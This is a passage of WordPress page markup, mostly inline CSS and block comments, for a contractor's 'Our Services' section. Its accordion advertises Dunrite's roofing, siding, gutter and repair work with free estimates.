.block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"2ed0dd46-9fb3-4e5b-a467-914055e0db1a\"} -->\n<style type=\"text/css\"> .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"3cba6fdd-d953-4ef9-8801-a52205e92af1\"} -->\n<style type=\"text/css\"> .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3cba6fdd-d953-4ef9-8801-a52205e92af1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ac4f996e-c6b4-4837-bf52-6ec14496e971\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ac4f996e-c6b4-4837-bf52-6ec14496e971\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Guaranteed</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"2ca58aed\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Roofing\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Siding\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Gutters\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Repairs\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-2ca58aed skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-2ca58aed {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"b558cea3\",\"title\":\"Roofing\",\"content\":\"With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-b558cea3 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Roofing</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>With Mike or Justin on every job you can be sure to receive quality that cannot be beat.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"c6160104\",\"title\":\"Siding\",\"content\":\"Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-c6160104 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Siding</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"886d432c\",\"title\":\"Gutters\",\"content\":\"As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-886d432c gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Gutters</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e4ac92de\",\"title\":\"Repairs\",\"content\":\"We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e4ac92de gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Repairs</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"8ade65a6-95be-43c3-a862-faf812de3e49\"} -->\n<style type=\"text/css\"> .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8ade65a6-95be-43c3-a862-faf812de3e49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6c332def-c8d3-4470-b49f-90dc1ba0fb14\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"dc07bcbb-e525-4314-b589-15be45dc4e59\"} -->\n<style type=\"text/css\"> .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 